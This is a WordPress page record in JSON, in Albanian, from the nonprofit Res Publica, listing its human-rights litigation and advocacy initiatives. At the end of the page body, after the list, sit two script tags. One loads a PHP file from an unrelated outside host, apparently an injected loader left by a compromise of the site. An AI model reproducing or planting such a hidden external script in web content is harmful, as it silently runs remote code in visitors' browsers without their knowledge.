{"id":125,"date":"2013-07-12T22:07:08","date_gmt":"2013-07-12T22:07:08","guid":{"rendered":"http:\/\/www.faqeinternet.al\/res\/?page_id=125"},"modified":"2023-09-22T19:20:06","modified_gmt":"2023-09-22T17:20:06","slug":"nismat","status":"publish","type":"page","link":"https:\/\/www.respublica.org.al\/web\/?page_id=125","title":{"rendered":"Nismat"},"content":{"rendered":"<p>\u201cRes Publica\u201d, si organizat\u00eb jofitimprur\u00ebse n\u00eb fush\u00ebn e interesit publik, \u00ebsht\u00eb konceptuar p\u00ebr t\u00eb p\u00ebrfaq\u00ebsuar dhe mbrojtur t\u00eb drejtat dhe interesat e ligjshme te individeve dhe grupeve n\u00eb nevoj\u00eb, p\u00ebr t\u00eb promovuar ndryshimin social dhe t\u00eb mir\u00ebn publike n\u00ebp\u00ebrmjet zbatimit t\u00eb ligjeve n\u00eb fuqi, si dhe lobimit p\u00ebr p\u00ebrmir\u00ebsimin e legjislacionit ekzistues.<\/p>\n<p>N\u00eb kushtet e nj\u00eb legjislacioni ende t\u00eb parregulluar mir\u00eb dhe t\u00eb pap\u00ebrshtatur me at\u00eb nd\u00ebrkomb\u00ebtar, Res Publica e ka vler\u00ebsuar t\u00eb arsyeshme t\u00eb investohet drejtp\u00ebrdrejti n\u00eb disa pika q\u00eb k\u00ebrkojn\u00eb zgjidhje konkrete si:<\/p>\n<ul>\n<li>Sigurimi i aksesit n\u00eb drejt\u00ebsi t\u00eb kategorive q\u00eb nuk kan\u00eb mund\u00ebsi t\u00eb paguajn\u00eb taks\u00ebn e padis\u00eb, duke e adresuar \u00e7\u00ebshtjen n\u00eb Gjykat\u00ebn Kushtetuese dhe Gjykaten Evropiane per te Drejtat e Njeriut;<\/li>\n<li>Sigurimi i nj\u00eb pozicioni t\u00eb qart\u00eb t\u00eb t\u00eb D\u00ebmtuarit Akuzues n\u00eb procedur\u00ebn penale, duke e adresuar \u00e7\u00ebshtjen n\u00eb Gjykat\u00ebn Kushtetuese dhe Gjykaten Evropiane per te Drejtat e Njeriut;<\/li>\n<li>Mbrojtja e liris\u00eb s\u00eb shprehjes s\u00eb gazetar\u00ebve dhe aktivist\u00ebve ne 9 procese gjyqesore;<\/li>\n<li>Trajnimi i gazetar\u00ebve dhe profesionist\u00ebve t\u00eb medias p\u00ebr t\u00eb njohur m\u00eb mir\u00eb kufijt\u00eb e liris\u00eb s\u00eb shprehjes, ne 5 qytete;<\/li>\n<li>Trajnimi i vajzave dhe grave rome dhe atyre t\u00eb zonave rurale p\u00ebr p\u00ebrfitimin e sh\u00ebrbimeve t\u00eb asistenc\u00ebs, ne 2 zona;<\/li>\n<li>Detyrimi i autoriteteve publike q\u00eb t\u00eb japin informacion dhe dokumente zyrtare, ne mbi 500 raste;<\/li>\n<li>Detyrimi i organit t\u00eb Prokuroris\u00eb t\u00eb jap\u00eb informacion dhe t\u00eb procedoj\u00eb fajtorin sipas k\u00ebrkes\u00ebs s\u00eb t\u00eb d\u00ebmtuarit nga vepra penale, duke e adresuar \u00e7\u00ebshtjen n\u00eb Gjykat\u00ebn e Lart\u00eb dhe<\/li>\n<li>Gjykat\u00ebn Evropiane p\u00ebr t\u00eb Drejtat e Njeriut;<\/li>\n<li>V\u00ebnia p\u00ebrpara p\u00ebrgjegj\u00ebsis\u00eb t\u00eb organeve t\u00eb administrat\u00ebs shtet\u00ebrore p\u00ebr shp\u00ebrblimin e d\u00ebmit jasht\u00ebkontrator n\u00eb mbi 40 raste;<\/li>\n<li>Aplikimi i shp\u00ebrblimit p\u00ebr vjet\u00ebrsi n\u00eb pun\u00eb edhe n\u00eb rastin e pushimeve kolektive nga puna, duke e adresuar \u00e7\u00ebshtjen n\u00eb Gjykat\u00ebn e Lart\u00eb n\u00eb 6 raste;<\/li>\n<li>V\u00ebnia p\u00ebrpara p\u00ebrgjegj\u00ebsis\u00eb civile t\u00eb kompanive tregtare t\u00eb cilat me an\u00eb t\u00eb operacioneve t\u00eb rrezikshme v\u00ebn\u00eb n\u00eb rrezik serioz jet\u00ebn, sh\u00ebndetin, dhe pasurin\u00eb e qytetar\u00ebve;<\/li>\n<li>V\u00ebnia e shtetit p\u00ebrpara p\u00ebrgjegj\u00ebsis\u00eb civile, n\u00eb rastet e mos garantimit t\u00eb t\u00eb drejt\u00ebs s\u00eb jet\u00ebs, n\u00eb kuadrin e ushtrimit t\u00eb s\u00eb drejt\u00ebs s\u00eb Tubimeve ne 3 raste;<\/li>\n<li>Garantimi i t\u00eb drejtave p\u00ebr t\u00eb mos u diskriminuar, t\u00eb drejt\u00ebs s\u00eb banes\u00ebs, mbrojtjen nga tortura dhe trajtime t\u00eb tjera \u00e7njer\u00ebzore, duke e adresuar n\u00eb Gjykat\u00ebn Evropiane p\u00ebr t\u00eb Drejtat e Njeriut p\u00ebr 80 aplikante;<\/li>\n<li>Mbrojtja e t\u00eb drejt\u00ebs p\u00ebr referendum n\u00eb 1 rast para KQZ dhe Gjykat\u00ebs Kushtetuese (referendumi kund\u00ebr importit t\u00eb mbetjeve);<\/li>\n<li>Mbrojtja e t\u00eb drejt\u00ebs s\u00eb tubimit dhe liris\u00eb s\u00eb shprehjes n\u00eb kuad\u00ebr t\u00eb saj, n\u00eb 2 raste;<\/li>\n<li>Mbrojtja e t\u00eb drejt\u00ebs p\u00ebr proces t\u00eb rregullt ligjor n\u00eb mbi 50 raste.<\/li>\n<\/ul>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u201cRes Publica\u201d, si organizat\u00eb jofitimprur\u00ebse n\u00eb fush\u00ebn e interesit publik, \u00ebsht\u00eb konceptuar p\u00ebr t\u00eb p\u00ebrfaq\u00ebsuar dhe mbrojtur t\u00eb drejtat dhe [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/125"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=125"}],"version-history":[{"count":6,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/125\/revisions"}],"predecessor-version":[{"id":2691,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/125\/revisions\/2691"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}